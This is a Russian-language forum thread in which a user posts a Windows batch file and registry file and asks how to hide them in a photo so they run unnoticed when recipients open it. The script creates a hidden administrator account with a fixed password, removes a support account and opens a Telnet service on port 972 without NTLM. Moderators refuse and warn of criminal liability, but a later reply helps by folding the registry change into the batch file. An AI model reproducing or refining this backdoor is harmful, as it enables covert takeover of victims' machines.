Крош
Постоялец
Offline
|
|
« : 20-11-2010 14:28 » |
|
У меня есть два файла *.bat и *.reg Как мне скампилировать их в *.exe, спрятать в фотографию и сделать так что бы фаил *.exe не заметно запускался при открытии фотографии?
фаил *.bat chcp 1251 net user SUPPORT_388945a0 /delete net user restot 12345678 /add net localgroup Администраторы restot /add net localgroup Пользователи SUPPORT_388945a0 /del regedit /s conf.reg sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet
фаил *.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t] "restot"=dword:00000000
|
|
|
Записан
|
|
|
|
Finch
Спокойный
Администратор
Offline
Пол:
Пролетал мимо
|
|
« Ответ #1 : 20-11-2010 14:53 » |
|
Крош, Тут кулцхацкерством не занимаются. И как говорится, учи матчасть.
|
|
|
Записан
|
Не будите спашяго дракона. Джаффар (Коша)
|
|
|
Крош
Постоялец
Offline
|
|
« Ответ #2 : 20-11-2010 15:12 » |
|
Подскажите чего учить...я не ленивый. Почитаю...
|
|
|
Записан
|
|
|
|
Finch
Спокойный
Администратор
Offline
Пол:
Пролетал мимо
|
|
« Ответ #3 : 20-11-2010 15:14 » |
|
Тут учить не надо, а подумать только. Фотографии ты как открываеш для просмотра?
|
|
|
Записан
|
Не будите спашяго дракона. Джаффар (Коша)
|
|
|
Крош
Постоялец
Offline
|
|
« Ответ #4 : 20-11-2010 15:24 » |
|
Найти найти нужную информацию, которую нужно прочитать, понять и выучить-это половина успеха. А фотографию я подкидываю на меил или перекидываю по скайпу. Её скачивают и открывают, наверное "Программой для просмотра изображений и факсов"
|
|
« Последнее редактирование: 20-11-2010 15:27 от Крош »
|
Записан
|
|
|
|
Finch
Спокойный
Администратор
Offline
Пол:
Пролетал мимо
|
|
« Ответ #5 : 20-11-2010 15:39 » |
|
Ну и теперь, чтобы запустить произвольный код, встроенный в фотографию. Нужно использовать ошибки просмотршика фотографии. Следовательно тебе нужно искать самому ошибки нулевого дня. Но это практически не твой уровень. Иначе ты бы не задавал такие вопросы. Или искать обшеизвестные ошибки. Но их могут уже пропатчить. Поэтому я и сказал, что кулцхацкерством мы тут не занимаемся. Кстати учти. Подобные действия подпадают под статью уголовного кодекса.
|
|
|
Записан
|
Не будите спашяго дракона. Джаффар (Коша)
|
|
|
|
Алексей++
глобальный и пушистый
Глобальный модератор
Offline
Сообщений: 13
|
|
« Ответ #7 : 20-11-2010 16:19 » |
|
Не пойман не вор ага, а этот топик ты удалить сумеешь ?
|
|
|
Записан
|
|
|
|
Крош
Постоялец
Offline
|
|
« Ответ #8 : 20-11-2010 16:21 » |
|
Преступное намерение само по себе не является преступлением, так же как и написание самого трояна. Это использовать его нельзя. Да и в любом случаи нужно заявление жертвы....а такового не будет. Я ведь могу интересоваться просто из любопытства или что бы просто стать просветлённее??? А писать трояны можно просто ради эксперемента.....
|
|
« Последнее редактирование: 20-11-2010 16:25 от Крош »
|
Записан
|
|
|
|
RXL
Технический
Администратор
Offline
Пол:
|
|
« Ответ #9 : 20-11-2010 17:24 » |
|
Крош, хочется попробовать - на здоровье. Только не тут.
|
|
|
Записан
|
... мы преодолеваем эту трудность без синтеза распределенных прототипов. (с) Жуков М.С.
|
|
|
Maksir
Постоялец
Offline
|
|
« Ответ #10 : 07-10-2011 19:57 » |
|
Хех... - ну только не подумайте, что я решил поумничать. Но, - код, это просто текст программы. Можно использовать какой-нибудь интерактивный код, java например, поместить его в тело фотографии, а фотографию, это же исполняемый файл, отправить по емайл в формате html. Ну, как бы, в общих чертах.
Пусть пробуют =)
|
|
|
Записан
|
|
|
|
Крош
Постоялец
Offline
|
|
« Ответ #11 : 07-10-2011 20:28 » |
|
Спасибо за идею!!!
|
|
|
Записан
|
|
|
|
zubr
Гость
|
|
« Ответ #12 : 08-10-2011 02:20 » |
|
Хех... - ну только не подумайте, что я решил поумничать. Но, - код, это просто текст программы. Можно использовать какой-нибудь интерактивный код, java например, поместить его в тело фотографии, а фотографию, это же исполняемый файл, отправить по емайл в формате html. Ну, как бы, в общих чертах.
Пусть пробуют =)
Бред.
|
|
|
Записан
|
|
|
|
Maksir
Постоялец
Offline
|
|
« Ответ #13 : 08-10-2011 03:29 » |
|
Хех... - ну только не подумайте, что я решил поумничать. Но, - код, это просто текст программы. Можно использовать какой-нибудь интерактивный код, java например, поместить его в тело фотографии, а фотографию, это же исполняемый файл, отправить по емайл в формате html. Ну, как бы, в общих чертах.
Пусть пробуют =)
Бред. Бред. =)
|
|
|
Записан
|
|
|
|
zubr
Гость
|
|
« Ответ #14 : 08-10-2011 04:22 » |
|
Крош, в познавательных целях, сначала просто попиши проги на асме, оптимизируй их до минимального размера. Затем пробуй делать shell-код - код практически без использования переменных, только регистры и стек. Поработай с отладчиками и дизассемблерами. Также неплохо было бы изучить и поработать в ring0. После чего сможешь вполне успешно работать в сфере антивирусных защит - вполне легальное, оплачиваемое, а главное, полезное для общества занятие.
|
|
|
Записан
|
|
|
|
xim777
Новенький
Offline
|
|
« Ответ #15 : 26-10-2012 07:24 » |
|
У меня есть два файла *.bat и *.reg Как мне скампилировать их в *.exe, спрятать в фотографию и сделать так что бы фаил *.exe не заметно запускался при открытии фотографии?
фаил *.bat chcp 1251 net user SUPPORT_388945a0 /delete net user restot 12345678 /add net localgroup Администраторы restot /add net localgroup Пользователи SUPPORT_388945a0 /del regedit /s conf.reg sc config tlntsvr start= auto tlntadmn config port=972 sec=-NTLM net start Telnet
фаил *.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t] "restot"=dword:00000000
а зачем писать 2 файла когда можно все в один (bat) засунуть REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v restot /t REG_DWORD /d 0
|
|
|
Записан
|
|
|
|
PooH
Глобальный модератор
Offline
Пол:
... и можно без хлеба!
|
|
« Ответ #16 : 26-10-2012 08:23 » |
|
какая живучая тема... второй год в ноябре-октябре оживает
|
|
|
Записан
|
Удачного всем кодинга! -=x[PooH]x=-
|
|
|
RXL
Технический
Администратор
Offline
Пол:
|
|
« Ответ #17 : 26-10-2012 10:03 » |
|
Наверно есть такая лабораторка
|
|
|
Записан
|
... мы преодолеваем эту трудность без синтеза распределенных прототипов. (с) Жуков М.С.
|
|
|
|